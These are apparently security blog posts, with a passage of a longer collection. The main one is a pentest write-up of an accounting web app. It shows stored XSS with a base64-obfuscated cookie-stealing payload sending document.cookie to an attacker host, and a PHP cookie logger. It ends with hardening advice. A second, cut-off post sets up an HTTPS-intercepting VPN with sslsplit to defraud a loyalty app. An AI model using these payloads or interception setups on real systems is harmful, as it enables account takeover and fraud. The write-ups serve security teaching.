As always, if you have any suggestions, ideas or you just want to say "Hi", hit me up on Twitter @mrgretzky or directly via e-mail at [email protected].

You can find Evilginx project on GitHub here:
Evilginx on GitHub

Till next time!

Sniping Insecure Cookies with XSS

22 March 2017 at 06:07
Sniping Insecure Cookies with XSS

In this post I want to talk about improper implementation of session tokens and how one XSS vulnerability can result in full compromise of a web application. The following analysis is based on an existing real-life web application. I cover the step-by-step process that lead to administrator's account take over and I share my thoughts on what could have been done to better secure the application.

Recently, I've performed a penetration test of a web application developed by an accounting company that handles my accounting. I figured that my own financial data is as secure as the application itself, so I decided to poke around and see what flaws I was able to find.

The accounting application, that I will be talking about, allows to check unpaid invoices, see urgent messages from accounting staff and keeps the user up to date on how much needs to be paid to various financial institutions.

One of the first things I do, when starting a new web penetration test, is finding out how session tokens are generated and handled. This often gives me quick insight into what I may be up against.

Meet the Token

As I found out, the application relies heavily on providing functionality via REST API and site content is generated dynamically using AngularJS with asynchronous requests.

I started by signing into my account. The sign-in packet sent to the REST backend looked as follows:

POST /tokens HTTP/1.1
Host: app.accounting.com:10443
Connection: close
Content-Length: 64
Accept: application/json, text/plain, */*
Origin: https://app.accounting.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: application/json
Referer: https://app.accounting.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8

{"email":"[email protected]","password":"super_secret_passwd"}

The response to my sign-in attempt with valid credentials looked like this:

HTTP/1.1 200 OK
Server: nginx/1.6.2 (Ubuntu)
Date: Wed, 15 Mar 2017 11:23:23 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 356
Connection: close
Vary: Accept-Encoding
Request-Time: 121
Access-Control-Allow-Origin: *

{"value":"eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg","account":{"id":77,"email":"[email protected]","status":"ACTIVE","role":"CLIENT_ADMIN","firstName":"John","lastName":"Doe","creationDate":"2016-01-22T18:14:23+0000"},"expirationDate":"2017-03-16T11:23:23+0000"}

The server replied with what looked like a session token and information about my account. The whole JSON reply, as I found out, was later saved into globals cookie, presumably to be accessible by the AngularJS client-side scripts. I learned that globals cookie was saved without secure or http-only flags set.

Without http-only flag, the cookie is accessible from javascript running under same domain, which I assumed was intended behaviour, as the client-side scripts could retrieve its data to populate website contents and use the session token with AJAX requests to REST backend. For cookies, without http-only flag set, it often ends badly once a single XSS vulnerability is discovered.

The lack of secure flag in the cookie, allows for its theft via man-in-the-middle attack. The attacker can just inject <img src="http://app.accounting.com/"> into browsed HTTP traffic and intercept the HTTP request including the session token cookie, which will be sent over unencrypted HTTP channel. It also doesn't help that the application doesn't have HTTP Strict Transport Policy enabled in response headers.

Lets focus on the session token itself, which reads:

eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg

During the web application penetration test I often sign-out and sign-in multiple times to see if the newly generated session token, provided by the server, differs much from the previous one. In this situation, it was apparent the token was in the JSON Web Token format.

In short, JSON Web Token aka JWT is a combination of user data and a hash signature. The hash prevents anyone who doesn't know the secret key, used in the hashing process, from crafting their own tokens. The token is divided into three sections and each is encoded with base64.

Dissecting this application's token we get:

JWT format: <encryption_algo_info>.<user_data>.<signature>
JWT: eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg  

atob('eyJhbGciOiJIUzI1NiJ9') => '{"alg":"HS256"}'
atob('eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30') => '{"tokenType":"AUTHORIZE","exp":1489663403,"id":77}'
atob('5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg') => <signature_hash_binary_data_HMAC_SHA256_user_data>

The server will re-calculate the signature hash of user_data with the secret key only known to the server. If the re-calculated hash differs from the one supplied with the token, it will not be accepted.

We can see that the token contains timestamp information of when it is supposed to expire (in this scenario tokens were valid for one day) and the ID of the user, who should be authorized. It is evident that if we were able to change the id value inside the token, it would allow us to be authorized as any registered user of the application. Issue is, we would have to re-calculate the signature hash using the secret key we don't know.

It is possible to brute-force the secret key using an offline dictionary attack and a powerful PC, but if the secret key is longer than 12 characters and uses also special characters, this will be a waste of time and more importantly a waste of CPU or GPU cycles.

There have already been many articles written on why using JWT is bad, so I'll try to keep my list short and stick to two major flaws:

  1. Possibility to crack the secret key. If the attacker has resources, time and enough motivation the secret key can be cracked.
  2. No way to invalidate the tokens. Every application that allows users to manage their accounts should invalidate and re-create the session token every time the user signs in, signs out or resets his/her password. This makes sure that any attacker who managed to intercept the user's session token will not be able to use it anymore. Attacker will immediately lose access to overtaken account. This cannot be done with JWT as the server will disallow the session token only after "exp":1489663403 timestamp is hit on the server.

Let's leave the fact that the application is using JWT as a session token and focus on the implications of allowing the session token to be accessible from javascript.

The sample request to REST backend, that includes the session token, looks as follows:

GET /messages/page/1?cacheTime=1489429271483&messagePageType=LATEST&pageSize=10&read=false HTTP/1.1
Host: app.accounting.com:10443
Connection: close
Accept: application/json, text/plain, */*
X-AUTH-TOKEN: eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Origin: https://app.accounting.com
Referer: https://app.accounting.com/
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8

As we can see, the session token is sent in a custom HTTP header X-AUTH-TOKEN. Sending session tokens in custom HTTP headers, protect applications from Cross-site Request Forgery (CSRF) attacks. Unfortunately, the fact that globals cookie, storing the token, must be available from javascript, in order to be included with a request, makes the application exceptionally vulnerable to token theft. All the attacker needs is one XSS vulnerability in the application, in order to capture the token cookie with injected javascript code.

With that in mind, I proceeded to look for vulnerabilities that would allow me to inject javascript code.

One XSS to Rule Them All

I found a messaging feature, in the application, that immediately caught my attention. Basically, it allowed all users to send any message to application's administrators and initiate a conversation. If vulnerable, it would make the perfect channel to send stored XSS straight to site admininstrators.

I put a blank message with one carriage return character, clicked Send and looked at the request:

PUT /messages HTTP/1.1
Host: app.accounting.com:10443
Connection: close
Content-Length: 1242
Accept: application/json, text/plain, */*
X-AUTH-TOKEN: eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Origin: https://app.accounting.com
Content-Type: application/json
Referer: https://app.accounting.com/
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8

{"id":3596,"content":"<div><br></div>","creationDate":"2017-03-13T19:42:36+0000","sender":{"id":77,"email":"[email protected]","status":"ACTIVE","role":"CLIENT_ADMIN","firstName":"John","lastName":"Doe","creationDate":"2016-01-22T18:14:23+0000"},"recipient":{"id":1,"email":"[email protected]","status":"ACTIVE","role":"OFFICE_ADMIN","firstName":"Admin","lastName":"Office","client":null,"creationDate":"2015-12-21T09:09:05+0000"},"modificationDate":null,"read":false,"attribute":null,"date":"13.03.2017 20:42"}

When I saw "content":"<div><br></div>" in the JSON request body, I knew I was right at home. The application swallowed and spit out the contents of the message back without any filtering at all. All supplied HTML tags were preserved.

I confirmed presence of XSS vulnerability by sending "content":"<script>alert(1)</script>" as a replacement for my message content, using the Edit feature and intercepting the request in Burp Proxy. After reloading, the page greeted me valiantly with javascript alert box.

Seeing that the request contained recipient information as well, it would be wise to test for ability to send messages to other users of the application, by tampering with the recipient data. This would let the attacker launch phishing attacks against other users. At this point I didn't bother as I had everything to set up an attack that would hopefully grant me administrator privileges.

The Attack

In order to intercept administrator's cookies, I decided to make my script create a new Image and append it to document's body. User's cookies would be sent to attacker's controlled server via GET parameters, embedded in the URL to fake image on attacker's web server.

Injected HTML code would look like this:

<img src="http://ATTACKER.IP/image.php?c=<stolen_cookies>" />

The moment, the browser will render this image, all of the visitor's cookies (for current domain) will be sent to attacker's server.

In order to dynamically inject the image into document's body, I required a javascript oneliner that will act as XSS payload. Here it was:

var img = new Image(0,0); img.src='http://ATTACKER.IP/image.php?c=' + document.cookie; document.body.appendChild(img);

To make it less obvious and to obfuscate our payload a bit, I converted it to use base64 encoding:

eval(atob('dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwOi8vQVRUQUNLRVIuSVAvaW1hZ2UucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpbWcpOw'));

My payload was ready, but I also needed a server backend at http://ATTACKER.IP/image.php that would wait for stolen cookies and log them for later retrieval. Here is a simple script in PHP that I used to do the job. Just remember to create the secretcookielog9977.txt file in advance and give it R/W permissions:

<?php

if (isset($_GET['c'])) $cookie = $_GET['c']; else exit;

$log = 'secretcookielog9977.txt';

$d = date('Y-m-d H:i:s');
$ua = $_SERVER['HTTP_USER_AGENT'];
$ip_addr = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];

$f = fopen($log, 'a+');
fputs($f, "Date: $d | IP: $ip_addr | UA: $ua | Referer: $referer\r\nCookies: $cookie\r\n\r\n");
fclose($f);

?>

With all that prepared, I returned to the application and edited my message for the last time. I have intercepted the edit HTTP request and replaced the content data with:

"content":"<script>eval(atob('dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwOi8vQVRUQUNLRVIuSVAvaW1hZ2UucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpbWcpOw'));</script>"

I reloaded the page and checked the secretcookielog9977.txt on my web server to confirm that I've managed to steal my own cookies. All worked perfectly.

Now, all I had to do is wait for the site administrator to sign in and read my malicious message. Shortly after...

** JACKPOT **

I had administrator's session token that was valid for 1 full day. Due to the token being JSON Web Token, there was no way for the administrator to invalidate it, even if it was found to be compromised.

With the administrator's token captured, the real attacker could have done significant damage. For me it was enough to demonstrate the risk and report my findings.

Game over

As demonstrated, the application had an evident stored XSS vulnerability that allowed the attacker to steal administrator user's cookies, including the session token. The XSS would have much less impact if the cookie was stored with http-only flag, thus making it inaccessible from javascript. Session token was made to be sent in every request to REST API in a custom X-AUTH-TOKEN header, so making it accessible from javascript was mandatory.

Here are my two cents on how the security of the pentested application could be improved:

1. Never allow cookies containing session tokens to be accessible from javascript.

In my opinion, cookies that include the session token or other critical data, should never be set without the http-only flag. Session token should be stored in a separate cookie flagged with http-only and REST API backend should reply with following HTTP headers:

Access-Control-Allow-Origin: https://app.accounting.com
Access-Control-Allow-Credentials: true

Then if the request to REST API, made from javascript, is done with property withCredentials : true, the cookie with the session token will be automatically attached and securely sent to the backend server in a Cookie: header. Furthermore, cookie will only be attached if the request is made from https://app.accounting.com origin URL, protecting the users from possible CSRF attacks. There is no need to use custom headers for transporting session tokens and it is always better to use standard cookies, which receive better protection from modern web browsers.

2. Authorize users with randomly generated session tokens.

Using JSON Web Token as session tokens is rather secure if you use a strong secret key, but keep in mind that if your encryption key ever gets leaked or stolen and the attackers get a hold of it, they will be able to forge their own session tokens, allowing them to impersonate every registered user in the application.

It is imperative for every web application to use randomly generated session tokens that can be invalidated at any time. Sessions should be invalidated every time the user signs in, signs out or resets their password. Such session handling will also protect users from session fixation attacks.

In the pentested application, the additional session token could be embedded inside the JWT itself, inside the data section, like so:

{"tokenType":"AUTHORIZE","exp":1489663403,"id":77,"token":"79c7d0c479011ca769be91c049dedae8b6e0cdec6c3ec7f652804fe446094b26"}

It is important to note here, that the application also used JWT as a verification token inside the reset password link. Password resetting functionality should always be handled using one-time tokens. Once the password is reset, the reset token should be invalidated to prevent anyone from using it again. Using JWT makes it possible to re-use the token for as long as the expiration timestamp allows.

3. Use Secure flag for all cookies.

If the application is served only via HTTPS (and it should), setting a secure flag on cookies, will allow them to be sent only over secure HTTPS connection. That way, the application's session tokens will never be sent in plain-text, making them protected against man-in-the-middle attacks.

Conclusion

I hope you found this little case study useful. Although I'm aware I haven't exhausted the subject of improper session handling or launching XSS attacks, I wanted to present a sample real-life scenario of a web application penetration test. If you are a web developer, you may look differently, from now on, into implementation of session tokens and maybe you will put more effort into filtering those nasty HTML tags in the output of user supplied data.

If you are looking for a web application penetration tester or reverse engineer, I will be more than happy to hear about your project and how I can help you.

I am always available on Twitter @mrgretzky or directly via email [email protected].

Have a nice day and see you in my next post!

How I Hacked an Android App to Get Free Beer

18 August 2016 at 06:37
How I Hacked an Android App to Get Free Beer

Just recently I stumbled upon an Android app that lets you receive free products in various pubs, restaurants or cafes in exchange for points accumulated with previous purchases. When the purchase is made, you let the vendor know that you want to receive points. In the app you select the types of products you bought. The eligible types of products may be "Beer", "Lunch" or "Spent 50 PLN". It all depends on the place. In order to verify the purchase, the vendor needs to swipe a physical beacon device over your phone (or enter a PIN if that doesn't work) and the application magically approves the transaction, granting you points.

As an example, one of the places offers you a free beer for 5 points and each purchased beer grants you 1 point. That gives you a free beer for every 5 purchased beers in that place.

Everyone likes free beer, so the first thing I thought about is how secure the purchase verification process is and how exactly do these magical beacons work?

More importantly, was there any way to get around the application's security and get a taste of free beer?

How I Hacked an Android App to Get Free Beer

I intentionally don't want to mention the name of the application as it only operates in my home country (in Poland). My goal is to give you an idea of what flaws similar applications may have, how to find them and how to better secure such applications. I've retained all technical details on how the application works, occasionaly replacing some easy to identify IDs or private information with random data.

In this post I will use a fictional name for the discussed application - "EatApp".

With that out of the way, let's get started!

Doing the research

The first thing I was most curious about was the beacon technology that is used with the application. The beacons apparently communicate with the mobile phone over bluetooth as the application made it clear that bluetooth needs to be turned on for the beacon swipes to work.

After a very short time I found the company that manufactures the same beacons that I saw working with EatApp. The company is Estimote and this is what they write about their beacon technology:

Estimote Beacons and Stickers are small wireless sensors that you can attach to any location or object. They broadcast tiny radio signals which your smartphone can receive and interpret, unlocking micro-location and contextual awareness.

With the Estimote SDK, apps on your smartphone are able to understand their proximity to nearby locations and objects, recognizing their type, ownership, approximate location, temperature and motion. Use this data to build a new generation of magical mobile apps that connect the real world to your smart device.

Estimote Beacons are certified Apple iBeaconโ„ข compatible as well as support Eddystoneโ„ข, an open beacon format from Google.

Apparently EatApp application detects the restaurant's beacon in close proximity, retrieves some identification values from the device and uses them to authorize the registration of new points with EatApp server.

How I Hacked an Android App to Get Free Beer

Thankfully Estimote has released an SDK with a very detailed documentation.

That allowed me to learn more about what information the beacon transmits. More technical information says that:

Estimote Beacon is a small computer. Its 32-bit ARMยฎ Cortex M0 CPU is accompanied by accelerometer, temperature sensor, and what is most importantโ€”2.4 GHz radio using Bluetooth 4.0 Smart, also known as BLE or Bluetooth low energy.

I've also learned that beacons broadcast the following values:

  • UUID - most commonly represented as a string, e.g. โ€œB9407F30-F5F8-466E-AFF9-25556B57FE6Dโ€
  • Major number - an unsigned short integer, i.e., an integer ranging from 1 to 65535, (0 is a reserved value)
  • Minor number - also an unsigned short integer, like the major number.

Great! They also provide their own Android library to make it very easy for any application to listen to beacon broadcasts. Here is one of the example code snippets from the tutorial on how to set up the beacon listener:

beaconManager = new BeaconManager(getApplicationContext());
// add this below:
beaconManager.connect(new BeaconManager.ServiceReadyCallback() {
    @Override
    public void onServiceReady() {
        beaconManager.startMonitoring(new Region(
                "monitored region",
                UUID.fromString("B9407F30-F5F8-466E-AFF9-25556B57FE6D"),
                22504, 48827));
    }
});

It looks to me that the UUID number must be constant and unique to the application using it. Major and Minor numbers on the other hand can describe the product, so in EatApp scenario they must be unique for every restaurant.

Whenever the application waits for the vendor to swipe their beacon over the phone, it listens for packets with specific UUID. If the broadcast packet is detected, it uses signal strength value to measure the beacon's proximity to the Android device. If the beacon's signal strength indicates that the device is close enough, it uses the Major and Minor numbers from the packet as validation keys, which are sent with the authorization packet to the EatApp's server.

I wondered what was the maximum range over which, the beacon was able to transmit its packets. The application must be constantly listening for beacon broadcast messages as it even gives you a push notification when you enter the restaurant where EatApp beacon is present. I didn't have to search long for an answer:

Estimote Beacons have a range of up to 70 meters (230 feet). The signal, however, can be diffracted, interfered with, or absorbed by water (including the human body). Thatโ€™s why in real world conditions you should expect range of about 40โ€“50 meters.

Wow. Up to 70 meters? That means that in theory the security keys (UUID, Major and Minor numbers), that are very likely used for authorizing the rewards, are broadcasted in clear air! That can't be good.

Knowing that beacon broadcast packets can be received over such range, I needed to find a way how to receive the packets and read their contents. It would probably take me few days to write my own Android app using Estimote SDK, but thankfully Estimote provides their own Estimote Developer App for debugging and troubleshooting problems. From the screenshots I could tell that it gathers all the critical information.

At that moment, obtaining the beacon information would not do me much good without any insight on how the application communicates with the server. It was time to set up a small lab for intercepting and decrypting HTTPS communication from the mobile phone.

The Fiddler in the Middle

For intercepting mobile phone traffic, I've used a Windows box. The best and free HTTP/HTTPS Windows proxy for inspecting and forging new packets, that I know of, is Fiddler.

Setting up Fiddler

In order to enable HTTPS interception in Fiddler, open Tools > Telerik Fiddler Options > HTTPS and make sure Capture HTTPS CONNECTs and Decrypt HTTPS traffic is checked. Also make sure that under Tools > Telerik Fiddler Options > Connections, you ticked the Allow remote computers to connect option.

You will also need to export Fiddler's Certificate Authority certificate. In the same tab, click Actions and click Export Root Certificate to Desktop like so:

How I Hacked an Android App to Get Free Beer

This will put a file named FiddlerRoot.cer on your desktop. This is the root certificate that Fiddler will use to generate forged certificates for every HTTPS connection that goes through the proxy. Obviously Fiddler's generated root certificate won't be on your phone's list of trusted certificate authorities and any HTTPS connection that goes through the proxy will be blocked. That's why you need to import Fiddler's certificate on your phone and add it to trusted CA storage.

To do that, first copy the FiddlerRoot.cer to the SD card on your phone by any means. On your phone open Settings > Security and select Install from SD card:

How I Hacked an Android App to Get Free Beer

Find and pick Fiddler's certificate file in order to import it. Now your phone will trust Fiddler's proxy and you will be able to intercept and decrypt HTTPS traffic. You need to make sure that both your phone and your Windows box with Fiddler are running on the same network.

Before you proceed, find out which port Fiddler's proxy listens on, by opening Tools > Telerik Fiddler Options > Connections and checking the port box:

How I Hacked an Android App to Get Free Beer

Next, find out the local network IP address of your Windows box. Open up cmd.exe command line prompt and type in ipconfig. You should be able to find your current IP address under the section with the network interface that you are currently using.

On your Android phone, open up Settings > Wi-Fi and find the wireless network that you are connected to. Touch the network entry for 2 seconds and select Modify network from the drop-down menu. In the dialog tick Advanced options and scroll down to proxy settings. For the proxy type you need to set Manual and under hostname and proxy port enter the IP address of your Windows box and the Fiddler's proxy port. I entered 192.168.0.14 as the hostname and 9090 as the proxy port number.

Now if everything went fine, you should be able to see the outgoing mobile phone traffic in Fiddler.

Capturing traffic

With this setup I was able to intercept EatApp's traffic as the application didn't implement certificate pinning. Otherwise, it would require more work to be done. I'd have to decompile the application, remove the certificate comparison check and recompile the application.

I opened up EatApp and opened up Earn Points dialog for randomly picked restaurant. As I didn't have the restaurant's Estimote Beacon on me (duh!), I had to use the option to enter the PIN number to verify the point rewards. I entered the random PIN number and checked the intercepted packets in Fiddler.

Sent request:

POST https://api.eatapp.com/users/461845f5d03e6c052a43afbc/points HTTP/1.1
Accept: application/json
Accept-Language: en-us
X-App-Version: 1.28.0
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4;)
...
Content-Type: application/json; charset=UTF-8
Content-Length: 265
Host: api.eatapp.com
Connection: Keep-Alive
Accept-Encoding: gzip

{
  "authentication_token":"boKUp9vBHNAJp7XbWZCK",
  "point":{
    "promoted_products_ids":[
      {"id":"760493597149625959620000"},
      {"id":"760493597149625959620000"}
    ],
    "pin":"1234",
    "place_id":"6088",
    "isDoneByGesture":false
  },
  "longitude":0.0,
  "latitude":0.0
}

Received reply:

HTTP/1.1 422 Unprocessable Entity
Server: nginx
Date: ...
Content-Type: application/json; charset=utf-8
Content-Length: 99
Connection: keep-alive
Vary: Accept-Encoding

{
  "status":"422 Unprocessable Entity",
  "code":"incorrectArgument",
  "title":"Incorrect argument: pin."
}

The request is not complicated. Parameters are sent as JSON data, there are no hash values being sent as a form of anti-tampering method with account state verification and the PIN is sent just in plain-text. The parameters are pretty self explanatory:

  • authentication_token - This is the account's authentication token that was received from the server during the login process. This value is unique to every EatApp account and won't change.
  • promoted_products_ids - the array of product type IDs that we are earning points for.
  • pin - the PIN number that we've entered.
  • place_id - the unique ID of the restaurant where we want to earn points.
  • isDoneByGesture - this one is a mystery, but I believe it is set to true only when you spend your points.
  • longitute and latitude - These are the last known GPS location values that were retrieved recently, letting the server know user's exact geographical location. This could be used as a security measure to detect if we are not too far away from the restaurant we are receiving points in.

At this point I wanted to try out if the application is vulnerable to PIN brute-forcing. After all, there are only 10'000 possible PIN combinations. Unfortunately after sending about 5 requests with different PIN values, I started to receive the following reply from the server:

HTTP/1.1 422 Unprocessable Entity
Server: nginx
Date: ...
Content-Type: application/json; charset=utf-8
Content-Length: 289
Connection: keep-alive
Vary: Accept-Encoding

{
  "status":"422 Unprocessable Entity",
  "code":"pinTooManyAttempts",
  "title":"Too many pin code attempts",
  "header":"Account locked",
  "message":"Earning and spending points and redeeming deals using your account has been locked for the next 30 minutes. Please let us know if this is a mistake."
}

Unless I had hundreds of EatApp accounts that I could switch between during the brute-force process, the 30 minutes account lockdown is a pretty strong deterrent.

Looking at the parameters of the verification request, I wondered what would the parameters be if the verification was done with the beacon swipe rather than with entering the PIN.

One idea of how free points could be earned, would be to remotely intercept the request packet with the correct PIN value entered by the restaurant's staff. Intercepting the packet remotely would also give me an opportunity to find the exact request parameters if beacon swipe was used instead of the PIN.

Main obstacle in performing this task is that I had to intercept the request from the mobile device, while I was at the restaurant.

That was a great opportunity to try setting up the interception VPN that would be used with 3G/4G connection on my mobile phone. The VPN server would then intercept and decrypt the HTTPS traffic the same way Fiddler did.

The Evil VPN

First of all, I required a VPS where I could install the VPN software. The fastest, easiest and most reliable way to set up a Linux box VPS is Digital Ocean (you will get 10$ credit if you sign up from this link). I created the cheapest Debian 8 1CPU 512MB RAM droplet for 5$/month or 0.007$/hour. This had to be more than enough for my needs.

I had to decide which VPN protocol I wanted to use. Android officially supports PPTP and L2TP types of VPN protocols. I've learned though that although PPTP is supported, it is considered insecure and Google doesn't trust it enough to enable Always-On feature for this kind of VPN. Always-On VPN feature in Android makes sure that your phone will reconnect to the VPN whenever the connection breaks and makes sure that no other packet will ever be sent NOT through the VPN. This is very important as I wanted to be absolutely sure that every single packet gets intercepted and decrypted.

Finding a good tutorial that would teach me how to install L2TP VPN on Debian 8 was very hard as most tutorials were written for Debian 7 and apparently in the later version of the system some dependencies changed and the tutorials became outdated.

Finally I found a perfect way to install IPsec/L2TP VPN with auto setup scripts. This is basically all I had to do on the server:

wget https://git.io/vpnsetup -O vpnsetup.sh
nano -w vpnsetup.sh
[Replace with your own values: YOUR_IPSEC_PSK, YOUR_USERNAME and YOUR_PASSWORD]
sudo sh vpnsetup.sh

YOUR_IPSEC_PSK - this should be you preshared key phrase (e.g. my_secret_psk_for_vpn).
YOUR_USERNAME and YOUR_PASSWORD - your username and password to login into the VPN.

All done in fire and forget manner! The VPN was up and running. Now it was time to set up the VPN connection on my phone. I went to Settings > Wireless & Networks (More) > VPN and added a new VPN and filled the settings as follows:

Name: vpn_interceptor
Type: L2TP/IPSec PSK
Server address: [VPN_SERVER_IP]
L2TP secret: (not used)
IPSec identifier: (not used)
IPSec pre-shared key: [YOUR_IPSEC_PSK]
DNS search domains: (not used)
DNS servers: 8.8.8.8
Forwarding routes: (not used)

Now that the VPN was added, I clicked the triple-dot Settings button in the same window and clicked Always-On option and then picked the newly created VPN connection.

This is when I ran into a problem on my Android 6.0. No matter how hard I wanted the VPN to connect, it would always show connection error. I tried on another Android 4.4 device and it worked perfectly, so I knew something was wrong with the latest version of Android. The Github page of the auto script did mention a workaround for Android 6 Marshmellow:

Note: Android 6 (Marshmallow) users should edit /etc/ipsec.conf on the VPN server and append ,aes256-sha2_256 to both ike= and phase2alg= lines. Then add a new line sha2-truncbug=yes immediately after those. Indent lines with two spaces. When finished, run service ipsec restart.

That didn't work, so I removed that "fix" from the server config files. Shortly after, I found a feature in the VPN profile settings called Backwards-compatible mode. I set that to Enable and *bang* - finally everything started to work.

Now that I had a working VPN, it was time to set up the interception and decryption of HTTPS packets. For that I decided to use SSLsplit software. Installation was easy:

wget http://mirror.roe.ch/rel/sslsplit/sslsplit-0.5.0.tar.bz2
tar jxvf sslsplit-0.5.0.tar.bz2
cd sslsplit-0.5.0
make
sudo make install

The IPSec/L2TP installation script created some advanced firewall settings for my new VPN setup and honestly I was not able to adjust it in such a way that allowed me to redirect HTTP/HTTPS packets to sslsplit proxy. I decided to completely purge the iptables settings and replace the iptables config file with the clean one, including some settings for redirecting packets to sslsplit.

iptables -F
iptables -t nat -F
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -t nat -A POSTROUTING -o ppp+ -j MASQUERADE
iptables-save > /etc/iptables.rules

Packet forwarding should already have been enabled (and should be re-enabled at every boot), because of the VPN auto setup script, but in order to be sure, you could run:

echo 1 > /proc/sys/net/ipv4/ip_forward

Next, I prepared the directory structure for sslsplit log files and created the sslsplit root certificate that will be used for generating forged HTTPS certificates the same way that Fiddler did before:

mkdir sslsplit
mkdir sslsplit/certs
mkdir sslsplit/logs
cd sslsplit/certs
openssl genrsa -out ca.key 2048
openssl req -new -x509 -days 3650 -key ca.key -out ca.crt

I had to download sslsplit/certs/ca.crt root certificate from the VPS, copy it my phone's SD card and import it as trusted certificate authority. That way my Android phone would allow any forged certificate generated by sslsplit to be accepted. You could easily download ca.crt file from your VPS via SSH protocol on Windows using WinSCP.

In order to easily turn on and off our HTTP/HTTPS interception, on the server, I decided to create two small shell scripts (my sslsplit directory was put in /root/):

/root/sslsplit/start.sh

#!/bin/bash
iptables-restore < /etc/iptables.rules
iptables -t nat -A PREROUTING -i ppp+ -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -i ppp+ -p tcp --dport 443 -j REDIRECT --to-ports 8443
sslsplit -d -l /root/sslsplit/connections.log -j /root/sslsplit/ -F /root/sslsplit/logs/%T -k certs/ca.key -c certs/ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

/root/sslsplit/stop.sh

#!/bin/bash
killall sslsplit
iptables-restore < /etc/iptables.rules

Now whenever I wanted to start intercepting packets, I'd run ./start.sh and if I wanted to stop, ./stop.sh. Simple. The sslsplit was configured to run as a daemon and it would log all raw packets into separate files in /root/sslsplit/logs/ directory. The logging feature of sslsplit is not perfect as it doesn't fully decode saved HTTP packets, it doesn't group packets in request/reply order and will put several packets into one file if they are sent at the same exact second, but for my needs it had to do fine. I will later describe how I overcame the HTTP decoding issue.

With the VPN setup done and HTTPS interception in place, I was finally able to drive to town, eat something and do some live packet capturing!

Trip to town

I visited three places and ordered some food in each one of them. During checkout I asked the vendor to register some EatApp points for the products I just had. At that point my phone was all the time connected to the interception VPN and the authorization packets were logged on the server by sslsplit.

I found out that if the location permission was turned off, the beacon proximity feature wouldn't work, thus in two places the staff had to use the PIN authorization. I retrieved two packets with correct PIN values in the first two places and in the third place I was able to capture the beacon authorization packet, after I enabled the location permission for the app.

Finally I had an opportunity to check out the official Estimote developer's app that was supposed to detect nearby beacon broadcasts and retrieve the broadcasted UUID, Major and Minor. It turned out my theory was correct:

How I Hacked an Android App to Get Free Beer

I still had to confirm at home if the broadcasted authorization keys were really used in the authorization packet, by analyzing the sslsplit log files.

Connecting the dots

I downloaded the sslsplit log files from the server. The issue with sslsplit is that it will log all HTTP packets in their raw form. Meaning that if the Transfer-Encoding is chunked or packet is compressed with gzip, the packets won't be logged in decoded plain-text form.

I have released a small script that is supposed to decode the sslsplit packets into clear text form. Please note that script uses a quite buggy http-parser library that I decided to use for parsing HTTP packets. For simple needs, though, it is "good enough". You can find splitparse.py on Github here.

Usage:

pip install http-parser
python splitparse.py -i [sslsplit_logs_dir] -o [output_dir]

I quickly found the request packet with the authorization data that was sent when the beacon was swiped over my phone:

POST /users/461845f5d03e6c052a43afbc/points
Accept: application/json
Accept-Language: en-gb
X-App-Version: 1.28.0
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1;)
...
Content-Type: application/json; charset=UTF-8
Content-Length: 375
Host: api.eatapp.com
Connection: Keep-Alive
Accept-Encoding: gzip

{
  "authentication_token":"boKUp9vBHNAJp7XbWZCK",
  "latitude":...,
  "longitude":...,
  "point":{
    "isDoneByGesture":false,
    "main_beacon":{
      "major":38995,
      "minor":12702,
      "uuid":"2C75E74B-41B7-49E3-BD26-CE86B2F569F8"
    },
    "place_id":"450",
    "promoted_products_ids":[
      {"id":"647035946536601578040000"},
      {"id":"647035946536601578040000"},
      {"id":"647035946536601578050000"}
    ]
  }
}

